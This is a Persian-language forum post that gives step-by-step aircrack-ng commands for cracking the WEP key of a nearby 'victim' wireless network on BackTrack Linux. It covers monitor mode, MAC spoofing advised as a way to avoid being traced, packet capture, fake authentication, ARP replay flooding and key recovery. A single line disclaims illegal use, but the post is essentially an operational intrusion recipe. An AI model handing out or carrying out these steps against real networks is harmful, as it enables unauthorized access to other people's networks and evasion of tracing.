SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

hack wifi wep in the backtrack5

بستن
X
 
 • فیلتر
 • زمان
 • نمایش
پاک کردن همه
نوشته‌های جدید

 • hack wifi wep in the backtrack5

  WEP یکی از الگریتم های رمزنگاری شبکه های بیسیم(۸۰۲٫۱۱) است که به طور گسترده در شبکه های بیسیم و مخصوصاً روتر های شبکه های سازمانی و مودم های بیسیم استفاده میشود. شکستن الگریتم WEP به علت ضعف های زیادی آن بسیار ساده است.
  فراموش نکنید، دانش قدرت است والی قدرت به شما این حق را نمیدهد که از قانون سر باز زده یا وارد حریم شخصی دیگران شده و از آن سوء استفاده کنید.

  برای شروع شما نیاز به یک کارت شبکه بیسیم و سیستم عامل لینوکس بک ترک(BackTrack) دارید. و برای وارد کردن دستورات از ترمینال بک ترک(خط فرمان لینوکس) استفاده میکنیم. برای باز کردن ترمینال برنامه آن را از نوار وظیفه بک ترک اجرا کنید.

  در صورتی که کارت شبکه شما توسط بک ترک شناسایی شده و آماده است کار را با دستور زیر شروع میکنیم.

  کد:
    airmon-ng
  این دستور رابط های شبکه رو لیست کرده و دستورات لازم برای قرار دادن رابط شبکه صحیح در حالت مانیتور را صادر میکند.در لینوکس رابط شبکه بیسیم(کارت شبکه بیسیم یا دستگاهی که ارتباط بیسیم از طریق آن برقرار میشود) با برچسب هایی مثل wlan0 یا ra0 و … شناسایی میشود. در صورتی که بیش از یک نوع رابط خاص دارید آنها با عدد انتهای برچسب مشخص میشوند. مثل wlan0 و wlan1.

  برچسب کارت شبکه خود را به یاد داشته باشید. ما در این مثال از wlan0 استفاده میکنیم. در صورتی که به کارت شبکه شما برچسب دیگری اختصاص داده شده باشد از آن در اجرای دستورات بعدی استفاده کنید:

  کد:
    airmon-ng stop wlan0
  این دستور حالت رابط wlan0 را از حالت مانیتور خارج میکند. در صورت موفقیت در خروجی دستور (monitor mode disabled) آن را به شما اعلام میکند. حالا دستورات بعدی:
  کد:
    ifconfig wlan0 down
  
    macchanger –mac 00:11:22:33:44:55 wlan0
  دستور اول کارت شبکه شما را قطع و برای دستور دوم آماده میکند و با اجرای دستور دوم کد mac شما با یک مک تقلبی عوض میشود. این کار برای کاهش ردگیری شما بسیار مفید است. حالا با دستور بعدی رابط بیسیم شما دوباره فعال میشود:

  کد:
    airmon-ng start wlan0
  در این دستور رابط شما فعال شده و در خروجی کنار برچسب و نوع چیپست و درایور عبارت monitor mode enabled هم نوشته میشود. در صورتی که دستورات بالا با موفقیط اجرا نشدند احتمالا رابط بیسیم شما قابلیت انجام این نوع نفوز را ندارد.

  در مرحله بعدی شروع به شناسایی شبکه های اطراف خود میکنیم:

  کد:
    airodump-ng wlan0
  این دستور شروع به لیست کردن شبکه های در دسترس میکند. در صورتی که شبکه مورد نظر شما در آن لیست نشد موقعیت مکانی خود را عوض کنید و به آن نزدیک تر شوید. در صورت لیست شدن شبکه هدف دکمه ctrl+C را بزنید تا اسکن متوقف شود.

  مقدار BSSID شبکه هدف را از جدول(ستون اول) و کانال آن از ستون CH را ذخیره کنید. اکثر عملیات رو قربانی بعد از این حول این دو متغیر خواهد بود.

  حالا با مشخصاتی که از شبکه قربانی و رابط بیسیم خود داریم شروع به استراق سمع شبکه میکنیم و نتیجه پاکت های جمع شده را در فایلی ذخیره میکنیم. برای این کار در دستور زیر مقادیر داخل پارانتز را با مقادیر بدست آمده در مراحل قبل اجرا کنید(پارانتز فقط برای نشان دادن متغیر است و آن را در دستور وارد نکنید):

  کد:
    airodump-ng -c (CH) -w (FileName) –bssid (bssid) (Wireless Interface)
  در این دستور به جای CH کانال، به جای File Name نام فایل، به جای bssid کد BSSID بدست آمده در دستور قبل و به جای Wireless Interface برچسب رابط خود را وارد میکنیم.

  ما به خروجی این دستور در مراحل بعدی نیاز داریم. پس یک پنجره کنسول جدید باز کنید و دستور زیر را در آن وارد کنید:

  کد:
    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (Wireless Interface)
  در این دستور به متغیر essid توجه کنید که همان نام شبکه(اکسس پوینت) هدف است و در آخرین ستون از دستور قبل آن را بدست آوردیم. در صورتی که دستور با موفقیت اجرا شده باشد پیغام ssociation successful در انتهای خروجی اضافه میشود.

  حالا شما در حال ذخیره پاکت های داده در حال تبادل با شبکه هدف هستید. از آن جایی که برای استخراج رمز عبور نیاز به بسته های بیشتری دارید ترافیک شبکه را با این دستور بالا میبریم:

  کد:
    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
  ممکن است این دستور از کل پهنای باند شبکه شما استفاده کند و شما تا زمانی که به اندازه کافی بسته های داده را جمع نکرده اید قادر به استفاده از شبکه نباشید. شما برای استخراج پسورد شبکه نیاز به ذخیره نزدیک به ۲۰ هزار بسته دارید. تعداد بسته های دریافت شده در زیر ستون $Data اضافه میشود. زمان لازم برای ذخیره این تعداد بسته با توجه به شرایط محیطی و نوع شبکه متغیر است اما معمولاً زمان زیادی برای این مرحله لازم است. پس در صورتی که از لپتاپ استفاده میکنید بهتر است باطری آن را کاملاً شارژ کرده باشید.

  پس از اینکه تعداد بسته کافی ذخیره شد پنجره کنسول جدیدی باز کنید و دستور زیر را برای کرک کردن wep وارد کنید:

  کد:
    aircrack-ng -b (bssid) (File Name.cap)
  File Name.cap همان نامیست که در مرحله شروع اسراق سمع وارد کردید. شما میتوانید در کاوش گر فایل هم این فایل فشرده را پیدا کنید. در صورتی که کرک کردن wep با موفقیت انجام شود در خروجی پیغام Key Found و در مقابل آن کلید دسترسی به شبکه به نمایش در می آید در غیر این صورت پیغام Failed به نمایش در میآید که به این معنیست که شما نیاز به جمع کردن بسته های بیشتری دارید.
  [align=center][/align]
  [align=center][/align]
صبر کنید ..
X